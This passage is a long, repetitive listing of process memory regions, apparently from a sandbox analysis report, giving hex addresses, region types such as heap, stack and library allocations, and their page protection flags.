page read and write
1E07BF72000
heap
page read and write
180C2C6A000
heap
page read and write
7FF7B3AE3000
trusted library allocation
page read and write
22A5F3ED000
heap
page read and write
206945E2000
heap
page read and write
20694667000
heap
page read and write
1C0C9E25000
heap
page read and write
7FF7B3962000
trusted library allocation
page read and write
12753550000
trusted library allocation
page read and write
1AF29DA8000
trusted library allocation
page read and write
1D93DD7A000
trusted library allocation
page read and write
53DCD7E000
stack
page read and write
6B3FB4E000
stack
page read and write
2159CE86000
heap
page read and write
20694651000
heap
page read and write
1EE96B97000
heap
page read and write
212F3E37000
heap
page read and write
1F0D388D000
trusted library allocation
page read and write
180C471E000
heap
page read and write
38D6837000
stack
page read and write
2159CF37000
heap
page read and write
173E679000
stack
page read and write
1EE96F79000
heap
page read and write
21B614C2000
heap
page read and write
21B615F8000
heap
page read and write
2159CC0E000
heap
page read and write
16082C66000
trusted library allocation
page read and write
7FF7B3AB0000
trusted library allocation
page read and write
2F6DDFE000
stack
page read and write
2159CF77000
heap
page read and write
1E07BF72000
heap
page read and write
288CCDD3000
heap
page read and write
21B61731000
heap
page read and write
251FD59A000
heap
page read and write
2276DFFD000
heap
page read and write
251FD3A2000
heap
page read and write
1D93D7B0000
heap
page readonly
44D13FC000
stack
page read and write
214ABF4E000
trusted library allocation
page read and write
1D93E0BC000
trusted library allocation
page read and write
2F6E23E000
stack
page read and write
1F0D3281000
trusted library allocation
page read and write
1EE9704F000
heap
page read and write
7FF7B3B30000
trusted library allocation
page read and write
258D1AB8000
heap
page read and write
1C5151E0000
trusted library allocation
page read and write
7FF7B37F3000
trusted library allocation
page execute and read and write
1C0C9AA3000
heap
page read and write
1AF1A3AA000
trusted library allocation
page read and write
201876FD000
heap
page read and write
2159CCE8000
heap
page read and write
1EE96C0D000
heap
page read and write
1C0C9AEA000
heap
page read and write
53DD33E000
stack
page read and write
1E07BF53000
heap
page read and write
1609A7B0000
heap
page read and write
22A5F0A6000
heap
page read and write
18A0000
heap
page read and write
2F6DF7E000
stack
page read and write
1AF30E00000
heap
page execute and read and write
1C51590B000
trusted library allocation
page read and write
1EC82C3E000
heap
page read and write
16082810000
trusted library allocation
page read and write
2159CD8A000
heap
page read and write
196803E3000
trusted library allocation
page read and write
1D93D7C0000
trusted library allocation
page read and write
288CCB68000
heap
page read and write
21B61749000
heap
page read and write
212F3D25000
heap
page read and write
1EC86129000
trusted library allocation
page read and write
212F3BA0000
heap
page read and write
1EE96C0D000
heap
page read and write
258D3A65000
heap
page read and write
2276E15D000
heap
page read and write
1E07BFA0000
heap
page read and write
1EE86FE000
stack
page read and write
22A5F40A000
heap
page read and write
1D93D7D0000
heap
page read and write
258D3A35000
heap
page read and write
7FF7B37ED000
trusted library allocation
page execute and read and write
20694659000
heap
page read and write
BC55DFF000
stack
page read and write
4A36FFD000
stack
page read and write
258D3923000
heap
page read and write
258D3A75000
heap
page read and write
12EBB99D000
heap
page read and write
2276E02A000
heap
page read and write
7FF7B37D2000
trusted library allocation
page read and write
EEE0893000
stack
page read and write
53DD1B8000
stack
page read and write
1F0D1363000
heap
page read and write
23FDA40B000
heap
page read and write
182D176C000
heap
page read and write
507F000
stack
page read and write
2276DEB2000
heap
page read and write
7FF7B3AA0000
trusted library allocation
page read and write
20694659000
heap
page read and write
1FC803D9000
trusted library allocation
page read and write
251FD59A000
heap
page read and write
1EE89BE000
stack
page read and write
9467638000
stack
page read and write
1C0CC066000
trusted library allocation
page read and write
D977AFF000
stack
page read and write
258D393F000
heap
page read and write
251FD3E7000
heap
page read and write
180C46C0000
heap
page read and write
2159CC0E000
heap
page read and write
202B2060000
trusted library allocation
page read and write
180C2B60000
heap
page read and write
1AF30E67000
heap
page execute and read and write
2159CB92000
heap
page read and write
20187A38000
heap
page read and write
D6C4DBF000
stack
page read and write
21700782000
trusted library allocation
page read and write
7FF7B3876000
trusted library allocation
page read and write
12EBBC45000
heap
page read and write
1E07B80E000
heap
page read and write
2A30000
heap
page execute and read and write
23FDC65B000
heap
page read and write
180C4707000
heap
page read and write
20694693000
heap
page read and write
22D54907000
trusted library allocation
page read and write
20694665000
heap
page read and write
288CCDA8000
heap
page read and write
23FDA3E9000
heap
page read and write
1F0D12D5000
heap
page read and write
20694500000
heap
page read and write
1FC80013000
trusted library allocation
page read and write
23FDC4BC000
heap
page read and write
1E079D4B000
heap
page read and write
251FD4D8000
heap
page read and write
7FF7B39D0000
trusted library allocation
page read and write
E68000
heap
page read and write
1275170C000
heap
page read and write
214A9C88000
heap
page read and write
288CCE01000
heap
page read and write
1C513871000
heap
page read and write
214ABF2D000
trusted library allocation
page read and write
182D186C000
heap
page read and write
2C443C30000
heap
page read and write
1070000
trusted library allocation
page read and write
1E07BCE5000
heap
page read and write
2069465D000
heap
page read and write
22D6C88C000
heap
page read and write
2159CD0B000
heap
page read and write
2159D04E000
heap
page read and write
AF7000
stack
page read and write
206945F5000
heap
page read and write
2159CB91000
heap
page read and write
202B071C000
heap
page read and write
20187A24000
heap
page read and write
1EC84E59000
trusted library allocation
page read and write
258D1AB0000
heap
page read and write
16080860000
heap
page read and write
203DED2A000
trusted library allocation
page read and write
2276E01B000
heap
page read and write
2276E35F000
heap
page read and write
12751705000
heap
page read and write
7FF7B3990000
trusted library allocation
page execute and read and write
21B6195F000
heap
page read and write
377957E000
stack
page read and write
203DC9D1000
heap
page read and write
38D64FE000
stack
page read and write
5039FFE000
stack
page read and write
212F3BAC000
heap
page read and write
214A9CDC000
heap
page read and write
180C4C3A000
heap
page read and write
4ED0000
heap
page execute and read and write
7FF7B3AD0000
trusted library allocation
page read and write
1AF1A3BC000
trusted library allocation
page read and write
E84000
heap
page read and write
1EE96CF8000
heap
page read and write
2159CF50000
heap
page read and write
AC9B6FF000
stack
page read and write
21B618A1000
heap
page read and write
7FF7B38B0000
trusted library allocation
page execute and read and write
1E079FE5000
heap
page read and write
173E37E000
stack
page read and write
7FF7B387C000
trusted library allocation
page execute and read and write
214A9CC0000
heap
page read and write
1E07B7E2000
heap
page read and write
22D548C0000
trusted library allocation
page read and write
1EE96C0E000
heap
page read and write
203DEF87000
trusted library allocation
page read and write
203DCA17000
heap
page read and write
2276E136000
heap
page read and write
1030000
trusted library allocation
page execute and read and write
23FDC3E8000
heap
page read and write
2C443890000
heap
page read and write
22C26CB8000
heap
page read and write
288CCEBF000
heap
page read and write
212F3BC8000
heap
page read and write
1710000
trusted library allocation
page read and write
23FDA40A000
heap
page read and write
251FD4DD000
heap
page read and write
237B3230000
trusted library allocation
page read and write
1C0C9E20000
heap
page read and write
201879FE000
heap
page read and write
7FF7B37F4000
trusted library allocation
page read and write
37799BC000
stack
page read and write
288CCB75000
heap
page read and write
1EE877D000
stack
page read and write
F256DFE000
stack
page read and write
1EE96BFA000
heap
page read and write
212F1C90000
heap
page read and write
1EE96F3C000
heap
page read and write
1EE96CFF000
heap
page read and write
38D6143000
stack
page read and write
953CAFF000
stack
page read and write
745AE7E000
stack
page read and write
EF1F0FF000
stack
page read and write
2159CF35000
heap
page read and write
1EE96BE7000
heap
page read and write
21700414000
trusted library allocation
page read and write
1EC82B80000
heap
page read and write
180C2ED5000
heap
page read and write
2159CBF2000
heap
page read and write
212F3F9E000
heap
page read and write
217102F2000
trusted library allocation
page read and write
BC555DE000
stack
page read and write
9466F5E000
stack
page read and write
23FDC3C9000
heap
page read and write
258D3A3D000
heap
page read and write
22A5D3B0000
heap
page read and write
201877DD000
heap
page read and write
1EE94D28000
heap
page read and write
7FF7B3A60000
trusted library allocation
page read and write
1EC82E10000
trusted library allocation
page read and write
202B071F000
heap
page read and write
1AF18850000
trusted library allocation
page read and write
1EE94DE3000
heap
page read and write
2159AD7F000
heap
page read and write
288CCA43000
heap
page read and write
1F0D12E0000
heap
page read and write
258D3933000
heap
page read and write
AC9B1FE000
stack
page read and write
2D81000
trusted library allocation
page read and write
206945F5000
heap
page read and write
21B6175D000
heap
page read and write
212F3CC8000
heap
page read and write
1EE8D3E000
stack
page read and write
22A5F3FB000
heap
page read and write
2159ACD7000
heap
page read and write
12EBD990000
heap
page execute and read and write
212F3E26000
heap
page read and write
1EE96F73000
heap
page read and write
1D93BD9B000
heap
page read and write
1E07BF3B000
heap
page read and write
2159CC91000
heap
page read and write
2018778C000
heap
page read and write
745A9FE000
stack
page read and write
3779ABE000
stack
page read and write
1EC82DE6000
heap
page read and write
202B262F000
trusted library allocation
page read and write
20187A1B000
heap
page read and write
2C445570000
heap
page read and write
53DC9C2000
stack
page read and write
212F3E2C000
heap
page read and write
182D18A8000
heap
page read and write
AC000BE000
unkown
page read and write
22A5F431000
heap
page read and write
CAB32FD000
stack
page read and write
38D65FE000
stack
page read and write
23FDC3C1000
heap
page read and write
258D3943000
heap
page read and write
12EBB910000
heap
page read and write
182D17DE000
heap
page read and write
2069465B000
heap
page read and write
7FF7B39A2000
trusted library allocation
page read and write
22C26C98000
heap
page read and write
127534A1000
trusted library allocation
page read and write
53DD3BB000
stack
page read and write
1F0D13E0000
heap
page read and write
2069464E000
heap
page read and write
2069462F000
heap
page read and write
2069468F000
heap
page read and write
2276C150000
heap
page read and write
173E57E000
stack
page read and write
173E273000
stack
page read and write
202B0610000
heap
page read and write
1D93DD2E000
trusted library allocation
page read and write
258D3943000
heap
page read and write
1AF190D4000
trusted library allocation
page read and write
22D55128000
trusted library allocation
page read and write
173E6BE000
stack
page read and write
2069465F000
heap
page read and write
212F3CF8000
heap
page read and write
237B32A2000
trusted library allocation
page read and write
288CCA7E000
heap
page read and write
C806AFF000
stack
page read and write
22A5F09A000
heap
page read and write
2276DFA0000
heap
page read and write
1F0D131E000
heap
page read and write
212F3E57000
heap
page read and write
212F3D0D000
heap
page read and write
7DF13CD000
stack
page read and write
21B614F2000
heap
page read and write
1AF16F40000
heap
page read and write
2C443AE0000
heap
page read and write
20187A34000
heap
page read and write
202B2160000
heap
page read and write
20185828000
heap
page read and write
201876FD000
heap
page read and write
1F0D12B0000
heap
page read and write
1EE96E4B000
heap
page read and write
7FF7B3A60000
trusted library allocation
page read and write
1E07B7D2000
heap
page read and write
22D528A2000
heap
page read and write
2276DFBD000
heap
page read and write
7FF7B39E0000
trusted library allocation
page execute and read and write
20187A38000
heap
page read and write
1D93D885000
heap
page read and write
1C0C9A9F000
heap
page read and write
1C0C9A80000
heap
page read and write
201876FB000
heap
page read and write
22A5D1E9000
heap
page read and write
251FD3A9000
heap
page read and write
20187682000
heap
page read and write
21B61739000
heap
page read and write
180C4C3A000
heap
page read and write
745ACFC000
stack
page read and write
D977DFE000
stack
page read and write
258D1B8A000
heap
page read and write
22D54977000
trusted library allocation
page read and write
212F3EA1000
heap
page read and write
1D93DDF4000
trusted library allocation
page read and write
206945DC000
heap
page read and write
20187240000
heap
page read and write
258D1E25000
heap
page read and write
258D39F0000
heap
page read and write
BC55CFE000
stack
page read and write
CAB35FB000
stack
page read and write
1E07C05E000
heap
page read and write
2C445576000
heap
page read and write
EF1F4FE000
stack
page read and write
217003E5000
trusted library allocation
page read and write
1E07BD9A000
heap
page read and write
258D1AD8000
heap
page read and write
1EE96F38000
heap
page read and write
1C51593D000
trusted library allocation
page read and write
23FDC2E0000
heap
page read and write
1AF18D79000
trusted library allocation
page read and write
237B18FD000
heap
page read and write
288CCDB4000
heap
page read and write
14BF0FA000
stack
page read and write
22D548E0000
trusted library allocation
page read and write
251FD41E000
heap
page read and write
16082CC6000
trusted library allocation
page read and write
288CCB00000
heap
page read and write
1C0CB4B0000
heap
page execute and read and write
2276DFE8000
heap
page read and write
22A5F3E3000
heap
page read and write
1AF1A5FB000
trusted library allocation
page read and write
E9F000
heap
page read and write
21700618000
trusted library allocation
page read and write
21B6175B000
heap
page read and write
1E07B7DF000
heap
page read and write
1D93C135000
heap
page read and write
2069462F000
heap
page read and write
2159CF19000
heap
page read and write
20187A5E000
heap
page read and write
7DF037D000
stack
page read and write
745A503000
stack
page read and write
21B6172E000
heap
page read and write
745AC7E000
stack
page read and write
2276E2A0000
heap
page read and write
7FF7B3A90000
trusted library allocation
page read and write
22D548C9000
trusted library allocation
page read and write
203DC8E0000
heap
page read and write
258D1ADF000
heap
page read and write
D977582000
stack
page read and write
22D528E9000
heap
page read and write
2159ACC9000
heap
page read and write
1AF16F60000
heap
page read and write
1C0C9A69000
heap
page read and write
2276E23B000
heap
page read and write
288CCB48000
heap
page read and write
1EE96C0D000
heap
page read and write
14BF8FE000
stack
page read and write
1C515200000
trusted library allocation
page read and write
1C51392C000
heap
page read and write
203DC8F0000
heap
page read and write
1276B960000
heap
page read and write
16080971000
heap
page read and write
1E07B790000
heap
page read and write
2276DEF2000
heap
page read and write
288CCDA7000
heap
page read and write
206945DD000
heap
page read and write
E60000
heap
page read and write
1E07B7C1000
heap
page read and write
7FF7B3A70000
trusted library allocation
page read and write
12EBDBE0000
trusted library allocation
page read and write
2C443B80000
trusted library allocation
page read and write
288CCA7E000
heap
page read and write
BC55BF7000
stack
page read and write
1EE96F3D000
heap
page read and write
20694665000
heap
page read and write
38D66FE000
stack
page read and write
2069465F000
heap
page read and write
1EC82DF0000
heap
page read and write
7FF7B3B40000
trusted library allocation
page read and write
2276C200000
heap
page read and write
AC0013E000
stack
page read and write
1EE96CBD000
heap
page read and write
288CCDB0000
heap
page read and write
20187A13000
heap
page read and write
212F1C40000
heap
page read and write
251FD71E000
heap
page read and write
212F3CA1000
heap
page read and write
214ABC45000
trusted library allocation
page read and write
1E07B806000
heap
page read and write
20694683000
heap
page read and write
AC9B5FE000
stack
page read and write
3FC08FF000
stack
page read and write
21B61732000
heap
page read and write
F256EFB000
stack
page read and write
BBB720E000
stack
page read and write
1609282C000
trusted library allocation
page read and write
212F3E22000
heap
page read and write
4A3717F000
stack
page read and write
21B61517000
heap
page read and write
2159CC99000
heap
page read and write
251FB7C5000
heap
page read and write
214ABBE4000
trusted library allocation
page read and write
22B80228000
trusted library allocation
page read and write
214A9CC6000
heap
page read and write
21B5F640000
heap
page read and write
23FDC2CB000
heap
page read and write
2159CF19000
heap
page read and write
212F3BA5000
heap
page read and write
258D38F5000
heap
page read and write
214ABC7F000
trusted library allocation
page read and write
7FF7B3B60000
trusted library allocation
page read and write
B88C2BB000
stack
page read and write
21701908000
trusted library allocation
page read and write
2C44392E000
heap
page read and write
6B3E723000
stack
page read and write
22D548C6000
trusted library allocation
page read and write
1609AAC0000
heap
page read and write
258D3C6E000
heap
page read and write
16080840000
heap
page read and write
31B0000
heap
page execute and read and write
182D18E8000
heap
page read and write
7FF7B39A0000
trusted library allocation
page execute and read and write
6476EFE000
stack
page read and write
251FD59A000
heap
page read and write
214ABBD1000
trusted library allocation
page read and write
258D3955000
heap
page read and write
3779B3E000
stack
page read and write
1EE96BE2000
heap
page read and write
201877A8000
heap
page read and write
12EBD8F0000
heap
page execute and read and write
5BEF000
stack
page read and write
251FD59A000
heap
page read and write
21B61736000
heap
page read and write
1F0D3274000
trusted library allocation
page read and write
2276DEEB000
heap
page read and write
288CCA7C000
heap
page read and write
20187791000
heap
page read and write
20694661000
heap
page read and write
1E07BCF8000
heap
page read and write
2C4438C0000
heap
page read and write
20187805000
heap
page read and write
185D000
stack
page read and write
251FD75F000
heap
page read and write
258D39F1000
heap
page read and write
22A5F3CB000
heap
page read and write
1275359E000
trusted library allocation
page read and write
1AF28D00000
trusted library allocation
page read and write
D6C5C0D000
stack
page read and write
EF1F1FF000
stack
page read and write
21B6160F000
heap
page read and write
203DC9D5000
heap
page read and write
2159CBE2000
heap
page read and write
288CCDC1000
heap
page read and write
1C0CB500000
heap
page read and write
21710001000
trusted library allocation
page read and write
1C51391B000
heap
page read and write
CAB2DFE000
stack
page read and write
23FDC3CC000
heap
page read and write
745ADFE000
stack
page read and write
201877CD000
heap
page read and write
1E079D4B000
heap
page read and write
461FF8000
stack
page read and write
288CCDD3000
heap
page read and write
38D6A3F000
stack
page read and write
237B17E0000
heap
page read and write
D977E7E000
stack
page read and write
7FF7B3A60000
trusted library allocation
page read and write
2F6EF0D000
stack
page read and write
1F0D3647000
trusted library allocation
page read and write
22D54DA2000
trusted library allocation
page read and write
1C0CB880000
trusted library allocation
page read and write
23FDC405000
heap
page read and write
1F0D2C70000
trusted library allocation
page read and write
258D3A75000
heap
page read and write
1C0CB850000
trusted library allocation
page read and write
22A5F035000
heap
page read and write
23FDC33E000
heap
page read and write
23FDC4BA000
heap
page read and write
2C445E4F000
trusted library allocation
page read and write
212F3BF8000
heap
page read and write
212F3CA9000
heap
page read and write
12751590000
heap
page read and write
2159CBD2000
heap
page read and write
251FD4ED000
heap
page read and write
94678BE000
stack
page read and write
1EE96E1C000
heap
page read and write
23FDC6BD000
heap
page read and write
288CCB85000
heap
page read and write
88BAEFE000
stack
page read and write
201858BA000
heap
page read and write
B88C1BE000
stack
page read and write
EEE10FE000
stack
page read and write
2069465F000
heap
page read and write
288CCB1D000
heap
page read and write
2159CB92000
heap
page read and write
22C26BD2000
heap
page read and write
64768F5000
stack
page read and write
953CEFE000
stack
page read and write
1F0D2D26000
heap
page read and write
1EE96E21000
heap
page read and write
1EE96CB8000
heap
page read and write
214ABBC9000
trusted library allocation
page read and write
B88C038000
stack
page read and write
288CABC5000
heap
page read and write
2159AE70000
heap
page read and write
1EE96BB7000
heap
page read and write
288CCA05000
heap
page read and write
1E07BD9C000
heap
page read and write
202B2100000
trusted library allocation
page read and write
288CCB86000
heap
page read and write
1E07BCA1000
heap
page read and write
7FF7B3A70000
trusted library allocation
page read and write
23FDC32A000
heap
page read and write
202B06E6000
heap
page read and write
212F3D1A000
heap
page read and write
7FF681C03000
unkown
page readonly
127538AA000
trusted library allocation
page read and write
1609A9A0000
heap
page execute and read and write
22A5F22A000
heap
page read and write
1EC8540B000
trusted library allocation
page read and write
251FD7A1000
heap
page read and write
7FF7B3870000
trusted library allocation
page read and write
258D395B000
heap
page read and write
21B614C7000
heap
page read and write
288CAB30000
heap
page read and write
251FD3A1000
heap
page read and write
20694654000
heap
page read and write
2C445A81000
trusted library allocation
page read and write
22C26CFA000
heap
page read and write
288CCB09000
heap
page read and write
22B80001000
trusted library allocation
page read and write
BC55513000
stack
page read and write
1C5156A0000
heap
page execute and read and write
1AF16F30000
heap
page read and write
21B61855000
heap
page read and write
180C2C69000
heap
page read and write
1EE96E4D000
heap
page read and write
14BF2FF000
stack
page read and write
20694665000
heap
page read and write
BBB738D000
stack
page read and write
1C0CBE09000
trusted library allocation
page read and write
21701CAA000
trusted library allocation
page read and write
1EE8B39000
stack
page read and write
202B06C9000
heap
page read and write
23FDC4BA000
heap
page read and write
22A5F1A9000
heap
page read and write
23FDC33E000
heap
page read and write
1EE96C0D000
heap
page read and write
1E07BF33000
heap
page read and write
212F3FA0000
heap
page read and write
22C26CC8000
heap
page read and write
288CCA68000
heap
page read and write
203DC97A000
heap
page read and write
745A97D000
stack
page read and write
1D93BE3C000
heap
page read and write
EEE0DFE000
stack
page read and write
7FF7B3972000
trusted library allocation
page read and write
4A3733E000
stack
page read and write
1EE96E29000
heap
page read and write
258D3CC3000
heap
page read and write
212F405E000
heap
page read and write
22B80087000
trusted library allocation
page read and write
20694680000
heap
page read and write
7DF077E000
stack
page read and write
160827C1000
trusted library allocation
page read and write
173E737000
stack
page read and write
1E07B791000
heap
page read and write
21B6151D000
heap
page read and write
237B3C7F000
trusted library allocation
page read and write
180C4DFF000
heap
page read and write
6B3E7EE000
stack
page read and write
745AA7E000
stack
page read and write
212F3E2C000
heap
page read and write
D6C4BFE000
stack
page read and write
2159CC0B000
heap
page read and write
1EE96D1A000
heap
page read and write
258D393E000
heap
page read and write
7FF7B3A40000
trusted library allocation
page read and write
217016EB000
trusted library allocation
page read and write
7FF7B3AE0000
trusted library allocation
page read and write
2C445EBC000
trusted library allocation
page read and write
1276B5A5000
heap
page read and write
7FF7B38A0000
trusted library allocation
page read and write
251FB5F7000
heap
page read and write
288CCA00000
heap
page read and write
22A5F07F000
heap
page read and write
1E07B80E000
heap
page read and write
258D3C9C000
heap
page read and write
7FF7B38A0000
trusted library allocation
page read and write
D977C7C000
stack
page read and write
6476FFE000
stack
page read and write
12EBD3FA000
heap
page read and write
7FF681B4C000
unkown
page readonly
2159AD6F000
heap
page read and write
212F1C60000
heap
page read and write
237B19F0000
heap
page read and write
21700229000
trusted library allocation
page read and write
1C0CBE1C000
trusted library allocation
page read and write
201876FD000
heap
page read and write
1AF16EC0000
heap
page read and write
7FF7B38A6000
trusted library allocation
page read and write
1EE96F90000
heap
page read and write
237B1920000
heap
page read and write
22C26CED000
heap
page read and write
7FF7B3A00000
trusted library allocation
page read and write
23FDC2EA000
heap
page read and write
201879FD000
heap
page read and write
180C46F2000
heap
page read and write
7FF7B3A30000
trusted library allocation
page read and write
22D54D39000
trusted library allocation
page read and write
1AF16FAD000
heap
page read and write
22C26CFA000
heap
page read and write
22A5F178000
heap
page read and write
1E07BCBD000
heap
page read and write
D6C4E38000
stack
page read and write
212F1CBF000
heap
page read and write
1AF28FEE000
trusted library allocation
page read and write
1C0C9E00000
heap
page read and write
12EBB9CA000
heap
page read and write
2276E24B000
heap
page read and write
1FC804CD000
trusted library allocation
page read and write
7FF7B3B00000
trusted library allocation
page read and write
180C4DFD000
heap
page read and write
22C26C7C000
heap
page read and write
258D3CB0000
heap
page read and write
7FF7B39AA000
trusted library allocation
page read and write
1C0CBDFF000
trusted library allocation
page read and write
20694693000
heap
page read and write
1E07B799000
heap
page read and write
21B61897000
heap
page read and write
212F3BF0000
heap
page read and write
2276DEA1000
heap
page read and write
203DC970000
heap
page read and write
2C443B30000
trusted library allocation
page read and write
16D4000
trusted library allocation
page read and write
C8070FE000
stack
page read and write
2159CF1C000
heap
page read and write
201858C8000
heap
page read and write
7FF7B39B2000
trusted library allocation
page read and write
22D5497D000
trusted library allocation
page read and write
6B3EE79000
stack
page read and write
258D3934000
heap
page read and write
3779BBB000
stack
page read and write
2159CB95000
heap
page read and write
6B3EDF6000
stack
page read and write
7FF7B39A1000
trusted library allocation
page read and write
2170118C000
trusted library allocation
page read and write
1D93E204000
trusted library allocation
page read and write
20187696000
heap
page read and write
21B6187C000
heap
page read and write
2276E02A000
heap
page read and write
258D1B6B000
heap
page read and write
2276E02A000
heap
page read and write
23FDC68E000
heap
page read and write
1EC84B09000
trusted library allocation
page read and write
2276DEE7000
heap
page read and write
2817EFF000
stack
page read and write
182D189D000
heap
page read and write
20187680000
heap
page read and write
20694661000
heap
page read and write
251FB500000
heap
page read and write
20694550000
remote allocation
page read and write
1EE96F79000
heap
page read and write
1C0CB460000
trusted library allocation
page read and write
212F1CD0000
heap
page read and write
251FD3C6000
heap
page read and write
2159CBA2000
heap
page read and write
203DED64000
trusted library allocation
page read and write
7FF7B39D0000
trusted library allocation
page read and write
2069468F000
heap
page read and write
38D657D000
stack
page read and write
251FD696000
heap
page read and write
461AFF000
stack
page read and write
251FD3EF000
heap
page read and write
1EE96CE8000
heap
page read and write
22D549C2000
trusted library allocation
page read and write
22A5F3FB000
heap
page read and write
258D3CF0000
heap
page read and write
4A36BD2000
stack
page read and write
203DCBA0000
heap
page readonly
EEE0FFC000
stack
page read and write
1AF311BA000
heap
page read and write
2159CF2B000
heap
page read and write
1EC82C43000
heap
page read and write
BBB663E000
stack
page read and write
1E07BD14000
heap
page read and write
212F3E22000
heap
page read and write
212F3CAC000
heap
page read and write
2276DFF8000
heap
page read and write
201857F0000
heap
page read and write
251FD4E8000
heap
page read and write
258D3964000
heap
page read and write
1E07BCC8000
heap
page read and write
288CCB58000
heap
page read and write
2159CBB6000
heap
page read and write
212F3C0B000
heap
page read and write
1EE96F2B000
heap
page read and write
1075000
trusted library allocation
page read and write
23FDC669000
heap
page read and write
1AF31390000
heap
page read and write
22D54870000
heap
page read and write
2276DFDD000
heap
page read and write
2159C840000
heap
page read and write
7FF7B37F0000
trusted library allocation
page read and write
212F3F57000
heap
page read and write
180C2C48000
heap
page read and write
237B1A00000
heap
page read and write
22D648F9000
trusted library allocation
page read and write
2276E24A000
heap
page read and write
946838D000
stack
page read and write
212F1CC0000
heap
page read and write
288CCA7E000
heap
page read and write
22A5F326000
heap
page read and write
23FDBE80000
heap
page read and write
14BF1FE000
stack
page read and write
212F3C10000
heap
page read and write
2069462D000
heap
page read and write
20694550000
remote allocation
page read and write
212F1D4C000
heap
page read and write
1EE94ED0000
heap
page read and write
1C0C9AE5000
heap
page read and write
B88BC7E000
stack
page read and write
7FF6819E1000
unkown
page execute read
1FC80222000
trusted library allocation
page read and write
2C443958000
heap
page read and write
180C4B68000
heap
page read and write
201876E2000
heap
page read and write
258D1A60000
heap
page read and write
23FDC3F8000
heap
page read and write
22A5F0AE000
heap
page read and write
20187A5D000
heap
page read and write
7FF7B3B20000
trusted library allocation
page read and write
2159ACD6000
heap
page read and write
20694653000
heap
page read and write
20694660000
heap
page read and write
21B6151D000
heap
page read and write
1D93DE5C000
trusted library allocation
page read and write
1AF1703D000
heap
page read and write
1E07B79A000
heap
page read and write
203DCA1B000
heap
page read and write
37798BC000
stack
page read and write
180C4DD3000
heap
page read and write
201858D5000
heap
page read and write
2C445930000
heap
page execute and read and write
21B5F7EA000
heap
page read and write
21B61502000
heap
page read and write
203DCB70000
trusted library allocation
page read and write
1609A9D0000
heap
page read and write
288CCB4D000
heap
page read and write
5039AFC000
stack
page read and write
2159CBB0000
heap
page read and write
202B26A3000
trusted library allocation
page read and write
2159CBE7000
heap
page read and write
1C0CC3B2000
trusted library allocation
page read and write
173E4FE000
stack
page read and write
180C4B49000
heap
page read and write
1968040F000
trusted library allocation
page read and write
21B5F739000
heap
page read and write
7FF7B3880000
trusted library allocation
page read and write
182D1765000
heap
page read and write
1F0D2CB0000
trusted library allocation
page read and write
2276C170000
heap
page read and write
237B19C0000
heap
page read and write
22A5F033000
heap
page read and write
22D52AB0000
trusted library allocation
page read and write
136B000
heap
page read and write
1EC82B90000
heap
page read and write
23FDC30F000
heap
page read and write
288CCB38000
heap
page read and write
16080A65000
heap
page read and write
182D17DC000
heap
page read and write
203DC950000
heap
page read and write
2159CBE2000
heap
page read and write
3FC0EFE000
stack
page read and write
2069465B000
heap
page read and write
EEE099F000
stack
page read and write
22A5F130000
heap
page read and write
201877F5000
heap
page read and write
2069465B000
heap
page read and write
20694693000
heap
page read and write
EEE107D000
stack
page read and write
7FF7B3A20000
trusted library allocation
page read and write
7FF7B3B00000
trusted library allocation
page read and write
7FF7B3980000
trusted library allocation
page execute and read and write
1EE96D1A000
heap
page read and write
1C513891000
heap
page read and write
22C26C81000
heap
page read and write
21B6161B000
heap
page read and write
23FDC4BA000
heap
page read and write
7DF07FE000
stack
page read and write
212F1CB9000
heap
page read and write
288CCA77000
heap
page read and write
20694665000
heap
page read and write
1EE978E000
stack
page read and write
102E000
stack
page read and write
12EBB9A0000
heap
page read and write
212F3BA8000
heap
page read and write
251FB67B000
heap
page read and write
7FF7B3AB0000
trusted library allocation
page read and write
5039EFE000
stack
page read and write
251FB5E8000
heap
page read and write
23FDC2C0000
heap
page read and write
251FD4E5000
heap
page read and write
1E079CCF000
heap
page read and write
1AF1912A000
trusted library allocation
page read and write
3FC10FF000
stack
page read and write
20187789000
heap
page read and write
1F0D372D000
trusted library allocation
page read and write
203DC910000
heap
page read and write
180C4E40000
heap
page read and write
251FD74C000
heap
page read and write
2276DB50000
heap
page read and write
212F3C08000
heap
page read and write
21B5F660000
heap
page read and write
1C0CC049000
trusted library allocation
page read and write
21B615DD000
heap
page read and write
1C0C9ABF000
heap
page read and write
20694580000
heap
page read and write
1609A871000
heap
page read and write
7FF7B3971000
trusted library allocation
page read and write
BC5559F000
stack
page read and write
7DF03FF000
stack
page read and write
F256CFE000
stack
page read and write
251FB5E9000
heap
page read and write
1EE96D1A000
heap
page read and write
212F3F5F000
heap
page read and write
1C0CBA20000
heap
page read and write
22A5F3D8000
heap
page read and write
217004CC000
trusted library allocation
page read and write
1EE96BD7000
heap
page read and write
21B61896000
heap
page read and write
6B3EC7E000
stack
page read and write
EF1F5FE000
stack
page read and write
201877D8000
heap
page read and write
12751673000
heap
page read and write
180C46B2000
heap
page read and write
1EE96C90000
heap
page read and write
258D3958000
heap
page read and write
20694694000
heap
page read and write
206945F5000
heap
page read and write
22C26BC2000
heap
page read and write
2069462F000
heap
page read and write
2276E15B000
heap
page read and write
21B6181E000
heap
page read and write
1AF3117A000
heap
page read and write
2159CF44000
heap
page read and write
22C26BA7000
heap
page read and write
4A36EFF000
stack
page read and write
20185760000
heap
page read and write
1EE94FB5000
heap
page read and write
1C0CB4A0000
trusted library allocation
page read and write
206945F5000
heap
page read and write
22A5F3CB000
heap
page read and write
1C0CC3BA000
trusted library allocation
page read and write
258D3C83000
heap
page read and write
288CCDB7000
heap
page read and write
12753553000
trusted library allocation
page read and write
2C44620D000
trusted library allocation
page read and write
1EC82C8A000
heap
page read and write
B88CC8F000
stack
page read and write
12753954000
trusted library allocation
page read and write
203DCC75000
heap
page read and write
2276DEB7000
heap
page read and write
1EE96C0D000
heap
page read and write
20694655000
heap
page read and write
2276E008000
heap
page read and write
7FF7B3886000
trusted library allocation
page read and write
212F3BB8000
heap
page read and write
12EBDF35000
trusted library allocation
page read and write
EC0000
heap
page read and write
2159CBA6000
heap
page read and write
9466ED2000
stack
page read and write
7FF7B39B0000
trusted library allocation
page execute and read and write
4F1E000
stack
page read and write
201877C8000
heap
page read and write
2C443919000
heap
page read and write
23FDC6BE000
heap
page read and write
2069468F000
heap
page read and write
2C445E6C000
trusted library allocation
page read and write
288CCA43000
heap
page read and write
1D955E20000
heap
page execute and read and write
22A5D148000
heap
page read and write
237B3260000
heap
page read and write
21B615C8000
heap
page read and write
9466FDE000
stack
page read and write
288CCA4C000
heap
page read and write
1EE96BFF000
heap
page read and write
201876D2000
heap
page read and write
